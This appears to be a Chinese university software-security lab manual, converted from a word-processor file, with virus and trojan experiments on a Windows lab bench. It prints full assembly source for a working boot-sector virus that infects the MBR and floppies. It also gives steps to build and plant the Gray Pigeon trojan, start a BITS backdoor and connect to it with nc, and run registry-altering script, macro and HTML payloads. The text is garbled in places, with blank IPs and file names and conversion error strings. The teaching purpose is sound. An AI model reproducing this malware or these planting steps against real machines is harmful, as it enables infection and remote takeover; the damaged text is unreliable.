軟件安全實驗步驟

腳本病毒實驗【實驗環(huán)境】Windows實驗臺【實驗步驟】打開Windows實驗臺，點擊桌面“病毒實驗”，選擇“腳本病毒實驗”，進入其實施面板，如圖2.4.12所示。圖2.4.12一、 腳本病毒代碼分析和查看分別選擇相應(yīng)的腳本文件，學(xué)生用戶即可查看腳本病毒代碼。在界面左側(cè)功能選擇區(qū)選擇實驗名稱，用戶在界面右側(cè)將會看到該腳本病毒的全部代碼。如圖2.4.13所示。圖2.4.13學(xué)生用戶如需要編輯腳本病毒代碼，用戶在界面右側(cè)將會看到該腳本病毒的全部代碼，在此基礎(chǔ)上編輯代碼，將會生成用戶自定義的腳本病毒，點擊“保存腳本”按鈕將把編輯好的腳本文件永久保存，如果編輯過程出現(xiàn)錯誤或者異常，點擊“重置腳本”將恢復(fù)最初的腳本代碼。實驗進行前，要先點擊“初始化病毒工具”按鈕，對其實驗所需的工具進行初始化；在實驗過程中，如果所需的工具被殺毒軟件查殺，要再次點擊“初始化病毒工具”按鈕，對工具重新進行初始化，以便實驗順利進行。腳本實現(xiàn)的步驟為：執(zhí)行(或恢復(fù))腳本；關(guān)閉EXPlorer進程；打開EXPlorer進程；查看腳本是否生效。二、 病毒攻擊實驗1 -復(fù)制病毒副本到系統(tǒng)文件夾(1) 在界面左側(cè)功能選擇區(qū)選擇實驗名稱“復(fù)制病毒副本到系統(tǒng)文件夾”。(2) 開始進行實驗，運行腳本病毒代碼，然后打開系統(tǒng)目錄，如圖2.4.14所示，可以看到病毒副本(Win32system.vbs)已經(jīng)出現(xiàn)。圖2.4.14(3) 開始恢復(fù)實驗，運行恢復(fù)代碼，如圖2.4.15所示；然后再次查看系統(tǒng)目錄，用戶會發(fā)現(xiàn)剛剛出現(xiàn)的病毒副本文件已經(jīng)被清除。圖2.4.15三、 病毒攻擊實驗2 -復(fù)制病毒副本到啟動菜單(1) 在界面左側(cè)功能選擇區(qū)選擇實驗名稱“復(fù)制病毒副本到啟動菜單”。(2) 開始進行實驗，運行腳本病毒代碼，然后打開系統(tǒng)目錄，可以看到開始菜單啟動項中新增加了腳本病毒W(wǎng)in32system.vbs，如圖2.4.16所示，下次開機將會自動執(zhí)行發(fā)作。圖2.4.16(3) 開始恢復(fù)實驗，運行恢復(fù)代碼，然后再次查看系統(tǒng)目錄，用戶會發(fā)現(xiàn)剛剛出現(xiàn)的病毒副本文件已經(jīng)被清除。四、 病毒攻擊實驗3 -禁止“運行”菜單(1) 在界面左側(cè)功能選擇區(qū)選擇實驗名稱“禁止運行菜單”。(2) 開始進行實驗，運行腳本病毒代碼，然后打開開始菜單，如圖2.4.17所示，“運行”已被禁止。圖2.4.17(3) 開始恢復(fù)實驗，運行恢復(fù)代碼，然后再次打開開始菜單，選擇“運行”，可以看到運行功能已經(jīng)恢復(fù)。五、 病毒攻擊實驗4 -禁止“關(guān)閉系統(tǒng)”菜單(1) 在界面左側(cè)功能選擇區(qū)選擇實驗名稱“禁止關(guān)閉系統(tǒng)菜單”。(2) 開始進行實驗，運行腳本病毒代碼，然后打開開始菜單，可以發(fā)現(xiàn)“關(guān)閉系統(tǒng)”菜單已經(jīng)消失，如圖2.4.18所示。圖2.4.18(3) 開始恢復(fù)實驗，運行恢復(fù)代碼，然后再次打開開始菜單，可以看到“關(guān)閉計算機”功能已經(jīng)恢復(fù)。六、 病毒攻擊實驗5 -禁止顯示桌面所有圖標(biāo)(1) 在界面左側(cè)功能選擇區(qū)選擇實驗名稱“禁止顯示桌面所有圖標(biāo)”。(2) 開始進行實驗，運行腳本病毒代碼，執(zhí)行系統(tǒng)注銷操作，可以發(fā)現(xiàn)桌面所有圖標(biāo)均已經(jīng)消失，如圖2.4.19所示。圖2.4.19(3) 開始恢復(fù)實驗，運行恢復(fù)代碼，可以發(fā)現(xiàn)桌面所有圖標(biāo)均已經(jīng)恢復(fù)。七、 病毒攻擊實驗6 -禁止“任務(wù)欄”和“開始”(1) 在界面左側(cè)功能選擇區(qū)選擇實驗名稱，禁止“任務(wù)欄”和“開始”。(2) 開始進行實驗，運行腳本病毒代碼，然后右鍵點擊開始菜單屬性，會有如圖2.4.110所示的提示信息，禁止修改任務(wù)欄信息。圖2.4.110(3) 開始恢復(fù)實驗，運行恢復(fù)代碼，再次修改開始菜單，功能已經(jīng)恢復(fù)。八、 病毒攻擊實驗7 -禁止“控制面板”(1) 在界面左側(cè)功能選擇區(qū)選擇實驗名稱“禁止控制面板”。(2) 開始進行實驗，運行腳本病毒代碼，選擇“開始”菜單下的“設(shè)置”，可以看到“控制面板”項消失了，如圖2.4.111所示。圖2.4.111(3) 開始恢復(fù)實驗，運行恢復(fù)代碼，選擇“開始”菜單下的“設(shè)置”，可以看到“控制面板”項已經(jīng)恢復(fù)了。九、 病毒攻擊實驗8 -修改“IE”默認(rèn)頁(1) 在界面左側(cè)功能選擇區(qū)選擇實驗名稱“修改IE默認(rèn)頁”。(2) 開始進行實驗，運行腳本病毒代碼，然后打開Internet EXPlorer屬性，可以看到“地址欄”默認(rèn)項已被進制更改，如圖2.4.112所示。圖2.4.112(3) 開始恢復(fù)實驗，運行恢復(fù)代碼，可以看到“地址欄”默認(rèn)項已經(jīng)恢復(fù)更改功能。DLL注入型病毒實驗 【實驗環(huán)境】Windows實驗臺所需工具：BITS.Dll 、IceSWord 【實驗步驟】一、 安裝BITS(Windows實驗臺)(1) 啟動Windows實驗臺，進入Windows2003系統(tǒng)。(2) 從實驗臺打開實驗工具箱，從“信息系統(tǒng)安全-計算機病毒”分類中下載DLL病毒并解壓。(3) 進入cmd命令行，在BITS文件夾下運行rundll32.exe BITS.dll,Install ；為連接的識別碼，主要用于識別遠(yuǎn)程連接屬于正常服務(wù)還是bits后門服務(wù)。輸入的命令具體如下：rundll32.exe BITS.dll,Install test。二、 連接BITS服務(wù)(本地主機)切換回本地主機系統(tǒng)，主動連接遠(yuǎn)程主機即Windows實驗臺系統(tǒng)的任一端口：(1) 從本地主機連接實驗工具箱，從“網(wǎng)絡(luò)安全-攻防系統(tǒng)中”下載NC連接工具并解壓。(2) 進入cmd命令行，在NC.exe所在文件夾下輸入nc 139命令，連接139端口(注： 為遠(yuǎn)程IP地址即Windows實驗臺IP)。(3) 然后直接輸入testdancewithdolphinxell:9999，激活9999端口，其中test為連接識別碼，與rundll32.exe BITS.dll,Install test中的test對應(yīng)。(4) 連接遠(yuǎn)程主機9999端口：輸入命令nc 9999；顯示如圖2.4.21所示，連接正常。(注： 為遠(yuǎn)程IP地址即Windows實驗臺IP) 圖2.4.21三、 查看BITS主機狀態(tài)(Windows實驗臺)(1) 查看Windows進程進入Windows實驗臺系統(tǒng)，打開任務(wù)管理器，查看進程信息，可以發(fā)現(xiàn)CMD程序正在運行，但實驗臺中并沒有運行CMD程序，如圖2.4.22所示。 圖2.4.22(2) 查看系統(tǒng)端口在cmd命令行下輸入netstat an，查看系統(tǒng)端口，如圖2.4.23所示，可以觀察到本地機（）對實驗臺（）9999端口進行的連接。 圖2.4.23(3) 查看模塊調(diào)用啟用icesword，查看模塊調(diào)用，如圖2.4.24所示。 圖2.4.24(4) 卸載驗證卸載dll進程，再次連接查看軟件是否工作正常。四、 卸載BITS(Windows 實驗臺)在Windows實驗臺的命令窗口執(zhí)行命令：rundll32.exe BITS.dll,Uninstall 木馬攻擊實驗 【實驗環(huán)境】Windows實驗臺所需工具：灰鴿子客戶端軟件、icesWord 【實驗步驟】啟動Windows實驗臺，并設(shè)置實驗臺的IP地址，以實驗臺為目標(biāo)主機進行實驗。個別實驗學(xué)生可以以2人一組的形式，互為攻擊方和被攻擊方來進行。一、 木馬制作(1) 根據(jù)攻防實驗制作灰鴿子木馬，配置安裝目錄，IP地址填寫攻擊方的IP地址（本例采用的是本地機）如圖2.4.31所示。 圖2.4.31(2) 啟動項配置，如圖2.4.32所示。 圖2.4.32(3) 高級設(shè)置，選擇使用瀏覽器進程啟動。并生成服務(wù)器程序，如圖2.4.33所示。 圖2.4.33二、 木馬種植(1) 通過漏洞或溢出得到遠(yuǎn)程主機權(quán)限，上傳并運行灰鴿子木馬（本例目標(biāo)以實驗臺為例）。服務(wù)器木馬程序如圖2.4.3-4 圖2.4.34(2) 本地主機利用灰鴿子對植入灰鴿子的主機進行連接，看是否能連接灰鴿子。三、 木馬分析(1) 察看端口當(dāng)灰鴿子的客戶端服務(wù)器啟動之后，會發(fā)現(xiàn)本地灰鴿子客戶端有主機上線，說明灰鴿子已經(jīng)啟動成功，如圖2.4.35所示。 圖2.4.35查看遠(yuǎn)程主機(實驗臺)的開放端口如圖2.4.36所示，肉雞正在與本地連接，表示肉雞已經(jīng)上線，可以對其進行控制。 圖2.4.36(2) 查看進程啟動icesWord檢查開放進程，進程中多出了IEXPLORE.exe進程，如圖2.4.37所示；這個進程即為啟動灰鴿子木馬的進程，起到了隱藏灰鴿子自身程序的目的。 圖2.4.37(3) 查看服務(wù)進入“控制面板”-“管理工具”中的“服務(wù)”選項查看，增加了一個名為huigezi的服務(wù)，查看其屬性如圖2.4.38所示；該服務(wù)為啟動計算機時，灰鴿子的啟動程序。 圖2.4.38四、 卸載灰鴿子(1) 停止當(dāng)前運行的IEXPLORE程序和huigezi服務(wù)。(2) 將Windows目錄下的huigezi.exe文件刪除，重新啟動計算機即可卸載灰鴿子程序。 引導(dǎo)型病毒實驗 【實驗環(huán)境】Windows實驗臺實驗工具：MaxDos5.8、masm5、WinHex 【實驗步驟】一、 查看主引導(dǎo)扇區(qū)打開Windows實驗臺，在啟動選項中選擇進入Windows2003系統(tǒng)；下載并解壓引導(dǎo)型病毒工具，打開WinHex工具，點擊菜單項“工具|磁盤編輯器”，打開磁盤編輯器，選擇“物理媒介-HD0”，如圖2.4.43和圖2.4.44所示；點擊“是”，即可查看第一塊硬盤的具體內(nèi)容，如圖2.4.45所示，其中第一個扇區(qū)即為主引導(dǎo)扇區(qū)。 圖2.4.43選擇“磁盤編輯器” 圖2.4.44選擇HD0 圖2.4.45主引導(dǎo)扇區(qū)二、 備份主引導(dǎo)扇區(qū)解壓msam5.zip(本例解壓到D盤根目錄下)，并將前面解壓到的“1.asm”文件復(fù)制到msam5目錄下。然后安裝MaxDos并重新啟動系統(tǒng)，在啟動選項中選擇進入MaxDos v5.8s，如圖2.4.46所示選擇“運行MaxDos v5.8s”，回車；密碼默認(rèn)為max，直接回車進入如圖2.4.47所示的界面，選擇“A.MaxDos工具箱”，回車。 圖2.4.46 MaxDos啟動選項，選擇“運行MaxDos v5.8s” 圖2.4.47 MaxDos首菜單，選擇“MaxDos工具箱”進入DOS系統(tǒng)界面，使用aefdisk工具對MBR進行備份，如圖2.4.48所示。 圖2.4.48備份MBR三、 編譯并運行主引導(dǎo)區(qū)病毒程序輸入如圖2.4.49和圖2.4.410所示的命令，編譯并運行主引導(dǎo)區(qū)病毒源碼1.asm（需放到masm5目錄下,此示例中masm5解壓到D盤根目錄）。 圖2.4.49編譯病毒源碼 圖2.4.410連接生成exe并運行1.asm的具體內(nèi)容與分析如下：;引導(dǎo)區(qū)病毒樣例.286.model small.code;程序入口參數(shù);ax=內(nèi)存高端地址 bx=7c00h 引導(dǎo)程序起始地址;cx=0001h 表示從ch(00)磁道cl(01)扇區(qū)讀出了本程序;dx=00/80h 表示從dx(00:A驅(qū))(80:C驅(qū))讀出了本程序;ds=es=ss=cs=0 初始段值OFF equ VirusSize=OFF End-OFF StartStart: jmp short Begin VirusFlag db V ;病毒標(biāo)志BootData: ;這里有兩個重要數(shù)據(jù)結(jié)構(gòu)，不能是代碼 org 50h ;病毒從Offset50h開始，病毒未用以上數(shù)據(jù)Begin: ;但其它程序可能使用，故須保留 mov bx,7c00h mov sp,bx ;設(shè)sp,使ss:sp=0:7c00h sti mov ax,ds:413h ;得到內(nèi)存大小(0:413h單元存有以K計數(shù)的內(nèi)存大小) dec ax dec ax mov ds:413h,ax ;將原內(nèi)存大小減2K mov cl,06 shl ax,cl ;計算高端內(nèi)存地址 mov es,ax xor di,di mov si,sp mov cx,VirusSize cld rep movsb ;把病毒搬移到高端地址里 push ax mov di,OFF HighAddr push di retf ;跳到高端繼續(xù)執(zhí)行HighAddr: cli ;修改中斷向量前，最好關(guān)中斷 xchg ds:13h*4+2,ax mov cs:OldInt13Seg,ax mov ax,OFF NewInt13 xchg ds:13h*4,ax mov cs:OldInt13Off,ax ;修改中斷13h push ds pop es ;把es復(fù)位為0 cmp dl,80h ;是否從硬盤引導(dǎo)？ jz short ReadOldHardBoot push dx ; 從軟盤引導(dǎo)，則傳染硬盤 mov dl,80h call OptDisk ;調(diào)用傳染模塊 pop dxReadOldFlopyBoot: ;讀出原軟盤引導(dǎo)程序 mov ax,0201h mov cx,79*100h+17 ;傳染時將原引導(dǎo)程序保存在0面79道17扇區(qū)中 mov dh,00h call CallInt13 jc short ReadOldFlopyBoot ;失敗，繼續(xù)讀直到成功ExecOldBoot: cmp es:bx.Flags,0aa55h jnz ExecOldBoot mov ah,02h int 1ah ;取系統(tǒng)時間 cmp cx,1*100h+30 ;是否大于01：30分 jb ExitDisp ;未到，則不顯示 lea si,VirusMsg DispMsg: mov al,cs:si inc si mov ah,0eh int 10h ;顯示al中的字符 or al,al jnz DispMsg xor ax,ax int 16hExitDisp: mov cx,0001h ;恢復(fù)cx初值 push es push bx retf ;去執(zhí)行原引導(dǎo)程序ReadOldHardBoot: mov ax,0201h mov cx,0002h ;傳染時將原硬盤主引導(dǎo)程序保存在0面0道2扇區(qū)中 mov dh,00h call CallInt13 ;讀出 jc short ReadOldHardBoot ;失敗，繼續(xù)讀直到成功 jmp short ExecOldBoot ;去執(zhí)行原引導(dǎo)程序NewInt13: ;新Int 13h（傳染塊） cmp dx,0000h ;是軟盤嗎？ jnz short JmpOldInt13 cmp ah,02h jnz short JmpOldInt13 cmp cx,0001h jnz short JmpOldInt13 call OptDisk ;若發(fā)現(xiàn)讀軟盤扇區(qū)，則感染軟盤JmpOldInt13: cli JmpFar db 0eah ;遠(yuǎn)跳轉(zhuǎn)指令 OldInt13Off dw ? OldInt13Seg dw ?CallInt13: pushf ;模擬Int 13h指令 push cs call JmpOldInt13 ret OptDisk: ;傳染dl表示的磁盤（dl-0 A: 80:C) pusha push ds push es ;保存段址與通用寄存器 push cs pop es push cs pop ds ;使ds=es=cs mov bx,OFF OldBootSpace mov ax,0201h mov cx,0001h mov dh,00h call CallInt13 ;讀原引導(dǎo)扇區(qū) jc short OptOver mov di,bx cmp ds:di.VirusFlag,V ;判斷是否已經(jīng)有病毒？ jz short OptOver ;若有，則退出 cmp dl,00h jz short IsOptFlopyDiskIsOptHardDisk: mov cx,0002h ;若是硬盤，保存在0面0道2扇區(qū) jmp short SaveOldBootIsOptFlopyDisk: mov cx,79*100h+17 ;若是軟盤，保存在0面79道17扇區(qū)SaveOldBoot: mov ax,0301h mov dh,0h call CallInt13 ;保存原引導(dǎo)扇區(qū) jc short OptOver mov si,OFF Start cld movsw movsb ;修改原扇區(qū)首指令（Jmp near 3字節(jié)） mov di,OFF Begin+200h mov si,OFF Begin mov cx,OFF End-OFF Begin cld rep movsb ;修改原引導(dǎo)扇區(qū)指令cx字節(jié) mov ax,0301h mov cx,0001h mov dh,00h call CallInt13 ;寫回已經(jīng)被修改了的引導(dǎo)程序OptOver: ;退出傳染 pop es pop ds ;恢復(fù)段址與通用寄存器 popa ret ;以下是病毒要顯示的信息，與病毒版本信息 VirusMsg db 0dh,0ah,07h,Night is deep,you must go sleep!,0dh,0ah,0 db Night Sleep ver 1.0,by whg 2001.5.5,0 End: org 1feh Flags dw 0aa55h ;引導(dǎo)扇區(qū)有效標(biāo)志 OldBootSpace db 210h dup(?) ;定義緩沖區(qū)Install: xor ax,ax mov ds,ax cli mov ax,ds:13h*4 mov cs:OldInt13Off,ax mov ax,ds:13h*4+2 mov cs:OldInt13Seg,ax mov dl,80h call OptDisk mov ax,4c00h int 21hEnd Install四、 病毒感染癥狀與分析運行1.exe后，重新啟動系統(tǒng)，首先看到如圖2.4.411所示的界面，回車即可進入正常的啟動選項；選擇進入Win2003，打開WinHex工具，可以看到主引導(dǎo)扇區(qū)已被修改，原主引導(dǎo)扇區(qū)的內(nèi)容已被病毒備份到第二個扇區(qū)，如圖2.4.412所示。 圖2.4.411系統(tǒng)啟動選項前的病毒提示 圖2.4.412被感染的主引導(dǎo)扇區(qū)五、 恢復(fù)MBR，清除病毒重新啟動系統(tǒng)，進入MaxDos，使用aefdisk對MBR進行恢復(fù)，如圖2.4.413所示（注意：在D盤生成的mbr.txt文件名大小寫）。 圖2.4.413恢復(fù)MBR恢復(fù)成功后重新啟動系統(tǒng)，無病毒提示界面，進入Win2003系統(tǒng)，使用WinHex查看主引導(dǎo)區(qū)，如圖2.4.414所示，已恢復(fù)為原內(nèi)容。 圖2.4.414已恢復(fù)的主引導(dǎo)扇區(qū)也可以嘗試在Dos下使用fdisk /mbr命令對主引導(dǎo)區(qū)進行恢復(fù)，進入Windows系統(tǒng)后需在計算機管理中對非系統(tǒng)盤重新分配盤符，以正確顯示在“我的電腦”中。 PE型病毒實驗【實驗環(huán)境】Windows實驗臺病毒實驗工具【實驗步驟】啟動Windows實驗臺，進入Windows2003系統(tǒng)；雙擊桌面上的“病毒實驗”圖標(biāo)，進入病毒實驗界面。在界面上選擇“PE病毒實驗”，進入其實施面板，如圖2.4.51所示。圖Error! No text of specified style in document.1實驗進行前，要先點擊“初始化病毒工具”按鈕，對其實驗所需的工具進行初始化；在實驗過程中，如果所需的工具被殺毒軟件查殺，要再次點擊“初始化病毒工具”按鈕，對工具重新進行初始化，以便實驗順利進行。一、 HOST程序分析(1) 點擊面板中“PE文件工具|瀏覽|host.exe”（C:ISES病毒ToolsVirusToolsPE目錄下），如圖2.4.52所示。圖Error! No text of specified style in document.2(2) 點擊“節(jié)表”，可查看節(jié)信息，如圖2.4.53所示。圖Error! No text of specified style in document.3(3) 點擊面板中的“host程序”，運行如圖2.4.54所示。圖Error! No text of specified style in document.4(4) 通過點擊面板中的“添加新節(jié)”，可使cc.exe感染host程序，然后點擊面板中的“host程序”，查看感染后的運行結(jié)果。二、 感染過程(1) 點擊面板中的“添加新節(jié)源碼”，可看到win32匯編編寫的病毒源碼，如圖2.4.55所示。圖Error! No text of specified style in document.5(2) 通過點擊面板中的“添加新節(jié)”，可使cc.exe感染host程序，出現(xiàn)如圖2.4.56所示的提示；然后點擊面板中的“host程序”，查看感染后的運行結(jié)果。圖Error! No text of specified style in document.6(3) 點擊確定，進入正常host程序，如圖2.4.57所示。圖Error! No text of specified style in document.7三、 感染前后對比及修改(1) 點擊面板中“PE文件工具|瀏覽|host.exe”，如圖2.4.58所示。圖Error! No text of specified style in document.8(2) 點擊“節(jié)表”，可查看節(jié)信息，如圖2.4.59所示。圖Error! No text of specified style in document.9(3) 幾個關(guān)鍵值的對比，如圖2.4.510和Error! Reference source not found.所示。圖Error! No text of specified style in document.10圖Error! No text of specified style in document.11(4) 簡單修改數(shù)值，以達(dá)到原先正常運行效果，如圖2.4.512所示設(shè)置相應(yīng)的值。圖Error! No text of specified style in document.12修改入口點為原先的FF，然后點擊應(yīng)用更改，成功修改完成；關(guān)閉peditor。然后點擊面板中的“host程序”結(jié)果正常運行。COM病毒實驗【實驗環(huán)境】Windows實驗臺所需工具：masm6.0版本 gold.exe反匯編工具(可自行網(wǎng)上下載，本實驗對其使用并不做要求)【實驗步驟】啟動Windows實驗臺，進入Windows2003系統(tǒng)。一、 準(zhǔn)備實驗環(huán)境(1) 在實驗臺系統(tǒng)中安裝masm 16，如圖2.4.61所示。圖2.4.61(2) 安裝完成后，加入相應(yīng)的環(huán)境變量，如圖2.4.62所示。圖2.4.62二、 自制(1) 在實驗臺系統(tǒng)的c盤目錄“c:temptemp”下新建兩個文件“c.asm”和“virus.asm”；“c.asm”中代碼如圖2.4.63所示。圖2.4.63(2) 編譯生成“c.exe”，運行如圖2.4.64所示。圖2.4.64(3) 可在當(dāng)前目錄下查看新生成文件，如圖2.4.65所示。圖2.4.65(4) 將“c.exe”轉(zhuǎn)換為“”程序，如圖2.4.66所示。圖2.4.66(5) 查看新生成的“”文件，如圖2.4.67所示。圖2.4.67三、 自制virus.exe(1) 在“virus.asm”中添加代碼，如圖2.4.68、圖2.4.69和圖2.4.610所示。圖2.4.68圖2.4.69圖2.4.610(2) 編譯生成可執(zhí)行文件，如圖2.4.611所示。圖2.4.611(3) 查看生成文件，如圖2.4.612所示。圖2.4.612四、 感染并查看(1) “”正常執(zhí)行。如圖2.4.613所示。圖2.4.613(2) 運行可執(zhí)行文件進行感染，如圖2.4.614所示。圖2.4.614(3) 感染后文件變化，如圖2.4.615所示。圖2.4.615感染前后文件大小與時間的變化(4) 復(fù)制“”一個新文件“”，以便后面修改使用，如圖2.4.616所示。圖2.4.616(5) 執(zhí)行“”結(jié)果如圖2.4.617所示。圖2.4.617五、 修復(fù)(1) 對“”進行修復(fù)，如圖2.4.618所示。圖2.4.618(2) 將“test1”改為“”，執(zhí)行，如圖2.4.619所示。圖2.4.619(3) 使用“glod.exe”匯編工具，查看相關(guān)修改前后的文件內(nèi)容，如圖2.4.620和圖2.4.621所示。圖2.4.620圖2.4.621郵件型病毒實驗 【實驗環(huán)境】Windows實驗臺所需工具：病毒實驗工具 【實驗步驟】一、 喬裝執(zhí)行后綴名(1) 啟動Windows實驗臺，在實驗臺中啟動實驗工具箱下載實驗工具并解壓縮。雙擊執(zhí)行MailServer.bat。從開始-程序-hMailServer-hMailServer Administrator啟動，點擊Connect按鈕并輸入密碼。在界面左側(cè)功能樹中選擇Status，確保服務(wù)狀態(tài)為“Running”，如圖2.4.71。此時郵件服務(wù)器中有兩個郵件賬戶：、，密碼均為：。 圖2.4.71(2) 從開始-程序-Microsoft Office- Microsoft Office 工具找到Microsoft Office 2003 用戶設(shè)置保存向?qū)Р?。選下一步，選擇“將原先保存的設(shè)置恢復(fù)應(yīng)用到本機上”。選下一步，點擊瀏覽選擇解壓縮得到的“用戶設(shè)置導(dǎo)出.OPS”文件，點擊完成-退出。此時Outlook中已導(dǎo)入了兩個郵件賬戶、及其服務(wù)器設(shè)置信息，默認(rèn)的Outlook發(fā)送郵件的賬戶為，并且兩個郵箱地址都保存在Outlook的地址簿中。(3) 將解壓縮得到的“mspaint.exe”文件（該文件是windows附帶的畫圖工具軟件）修改文件名為“hello.txt.exe”，創(chuàng)建并將其添加到壓縮包“hello.rar”。(4) 啟動Microsoft Office Outlook 2003（啟動中及后續(xù)實驗中彈出的安裝提示可以全部按取消按鈕）。點擊工具欄新建按鈕，新建郵件。收件人填寫，主題和郵件正文可以隨意填寫。點擊工具欄的回形針按鈕添加附件，選擇剛創(chuàng)建的“hello.rar”文件。郵件編寫完成且尚未發(fā)送，如下圖： (5) 恢復(fù)Windows資源管理器對文件類型擴展名的默認(rèn)設(shè)置。打開資源管理器，依次打開菜單欄-工具-文件夾選項-查看，將“隱藏已知文件類型的擴展名”選中，如圖2.4.71所示。 圖2.4.71(6) 發(fā)送上一步中編寫的郵件（若彈出安全警告選擇仍然繼續(xù)發(fā)送）。發(fā)送成功后繼續(xù)在Outlook界面中按F9快捷鍵收取郵件（若提示輸入密碼時輸入密碼：，并選中“將密碼保存在密碼表中”復(fù)選框）。收到郵件后，可以看到帶有一個附件“hello.rar”，下載附件并解壓可以看到文件“hello.txt”，如圖2.4.72所示 圖2.4.72(7) 看似為txt文件文件，其實為可執(zhí)行文件，雙擊打開可以發(fā)現(xiàn)實際是運行了一個畫圖程序。(8) 回到資源管理器的“文件夾設(shè)置”，去掉該選項，即可看到hello.txt的真正后綴名，如圖2.4.74所示。 圖2.4.74二、 收到可執(zhí)行的vbs腳本文件一般利用vb腳本進行Outlook的控制發(fā)送，通常情況下為公司內(nèi)局域網(wǎng)，根據(jù)地址本中所含地址，逐個發(fā)送帶毒文件，代碼大致如圖2.4.75和圖2.4.76所示。 圖2.4.75 圖2.4.76將Outlook中的、兩個郵箱添加到通訊簿中后，執(zhí)行上述腳本代碼（此腳本代碼可從試驗臺中打開實驗工具箱按照“實驗源碼”-“計算機病毒源碼”下載獲?。?。Outlook的安全機制會給出一些警告提示，出現(xiàn)的效果如2.4.77所示。 2.4.77如果用戶由于在不知情的情況下或者安全意識薄弱甚至誤操作等原因，而選擇了允許訪問及郵件發(fā)送，就造成了病毒的傳播。在較高版本的Outlook中可以允許用戶設(shè)置此類警告信息為不提示，更增加了病毒傳播的機會。Outlook地址簿中保存的郵箱會收到如下的郵件： Outlook的安全機制判斷附件為不安全因素而禁止用戶訪問附件，但使用其他簡易郵件客戶端或者用瀏覽器收取郵件時，用戶可能會下載并執(zhí)行附件腳本造成病毒的進一步傳播。郵件病毒一般為附著型病毒，也就是通過郵件的形式來傳播，病毒內(nèi)部機制還是信賴其它文件型、木馬、蠕蟲等病毒體來發(fā)揮作用。通常不輕易打開不明附件，便無此類事件發(fā)生。 Word宏病毒實驗【實驗環(huán)境】Windows實驗臺所需工具：Word2003、Outlook2003【實驗步驟】啟動Windows實驗臺，進入Windows2003系統(tǒng)；雙擊桌面上的“病毒實驗”圖標(biāo)，進入病毒實驗界面。在界面上選擇“Word宏病毒實驗”，進入其實施面板，如圖2.4.81所示。圖2.4.81實驗進行前，要先點擊“初始化病毒工具”按鈕，對其實驗所需的工具進行初始化；在實驗過程中，如果所需的工具被殺毒軟件查殺，要再次點擊“初始化病毒工具”按鈕，對工具重新進行初始化，以便實驗順利進行。一、 使用示例1代碼選擇“示例1源碼”，在右側(cè)病毒介紹框內(nèi)查看示例1 的源碼，如圖2.4.82所示。圖2.4.82二、 對doc1進行病毒殖入(1) 點擊“啟動doc1”，打開Word文檔，在工具欄點擊“安全性”，設(shè)置Word安全性，如圖2.4.83所示。圖2.4.83(2) 按下Alt+F11，如圖2.4.84所示；打開如圖2.4.85所示的project(Doc1)中的ThisDocument，將示例1的源代碼復(fù)制到此。圖2.4.84圖2.4.85(3) 查看“Normal|ThisDocument”，如圖2.4.86所示Normal下的ThisDocument為空。圖2.4.86(4) 關(guān)閉doc1文檔。然后再點擊面板中的“啟動doc1”，在doc1打開的過程中，會出現(xiàn)如圖2.4.87所示的提示框，示例代碼1執(zhí)行成功。圖2.4.87三、 結(jié)果分析(1) 按下Alt+F11，查看其下的Normal模板中的ThisDocument，已被植入病毒代碼，如圖2.4.88所示。圖2.4.88(2) 這時再打開其它doc文件，都會發(fā)生彈出對話框的效果，如圖2.4.89所示。圖2.4.89四、 查殺方法(1) 禁止宏防御宏病毒的根本，在于打開Word文檔時先禁止所有以auto開頭的宏。方法是：單擊工具菜單下的“宏”，然后單擊“安全性”，在如圖2.4.810所示的對話框中選擇“非常高”，這樣Word就有了防止“自動宏”執(zhí)行的功能，將取消未經(jīng)簽署的任何宏。圖2.4.810(2) 刪除來歷不明的宏在宏管理器中，刪除全部可疑宏，或者在宏編輯器中刪除可疑宏。(3) 恢復(fù)被宏病毒所破壞的Word1) 退出Word，然后先到系統(tǒng)盤(c:)根目錄下查看是否存在autoexec.dot文件，如果存在，而又不知道它是什么時候出現(xiàn)的，刪除之。2) 找到normal.dot文件(一般在C:Documents and SettingsAdiministratorApplication DataMicrosoftTemplates目錄中)，用先前的干凈備份替換之或干脆刪除之(會重新生成一個)。3) 查看normal.dot所在目錄是否還存在其它模板文件，如果存在且不是自己復(fù)制進去的，刪除之。4) 重新啟動Word，即可恢復(fù)正常。HTML惡意代碼實驗【實驗環(huán)境】Windows實驗臺所需工具：瀏覽器IE6.0或以上版本【實驗步驟】啟動Windows實驗臺，進入Windows2003系統(tǒng)；雙擊桌面上的“病毒實驗”圖標(biāo)，進入病毒實驗界面。在界面上選擇“HTML惡意代碼實驗”，進入其實施面板。實驗進行前，要先點擊“初始化病毒工具”按鈕，對其實驗所需的工具進行初始化；在實驗過程中，如果所需的工具被殺毒軟件查殺，要再次點擊“初始化病毒工具”按鈕，對工具重新進行初始化，以便實驗順利進行。一、 進行test.html編輯(1) 點擊面板中“編輯test網(wǎng)頁”，將“更改主頁”中代碼添入并保存退出。如圖2.4.91所示。圖2.4.91(2) 此時，test.html網(wǎng)頁已為包含惡意代碼網(wǎng)頁；在啟動時，將修改注冊表中“HKEY_CURRENT_USERSoftwareMicrosoftInternet EXPlorerMainStart Page”的值為“”。二、 被攻擊現(xiàn)象(1) 點擊面板中的“啟動test網(wǎng)頁”，如圖2.4.92所示。圖2.4.92(2) 點擊“是”，執(zhí)行完成，運行結(jié)果如圖2.4.93所示。圖2.4.93(3) 查看注冊表中項，已改變，如圖2.4.94所示。圖2.4.94(4) 如果將html放入IIS中，被其它主機訪問時，其它主機的IE需要進行設(shè)置，便可不出現(xiàn)步驟(1)中的提示了，如圖2.4.95所示，將“Internet”和“本地Intranet”中的，“自定義設(shè)置”中的“安全設(shè)置”中所有的選項都“啟動”。圖2.4.95三、 防治方法(1) 要避免被網(wǎng)頁惡意代碼感染，首先關(guān)鍵是不要輕易去一些并不信任的站點。(2) 運行IE時，點擊“工具|Internet選項|安全|Internet區(qū)域的安全級別”，把安全級別由“中”改為“高”。具體方案是：在IE窗口中點擊“工具|Internet選項”，在彈出的對話框中選擇“安全”標(biāo)簽，再點擊“自定義級別”按鈕，就會彈出“安全設(shè)置”對話框，把其中所有ActiveX插件和控件以及與Java相關(guān)全部選項選擇“禁用”。(3) 一定要在計算機上安裝防火墻，并要時刻打開“實時監(jiān)控功能”。(4) 在注冊表的KEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem下，增加名為DisableRegistryTools的DWORD值項，將其值改為“1”，即可禁止使用注冊表編輯器命令regedit.exe。因為特殊原因需要修改注冊表，可應(yīng)用如下解鎖方法：開始-運行-gpedit.msc 打開組策略 左面分級展開 用戶配置-管理模板-系統(tǒng) 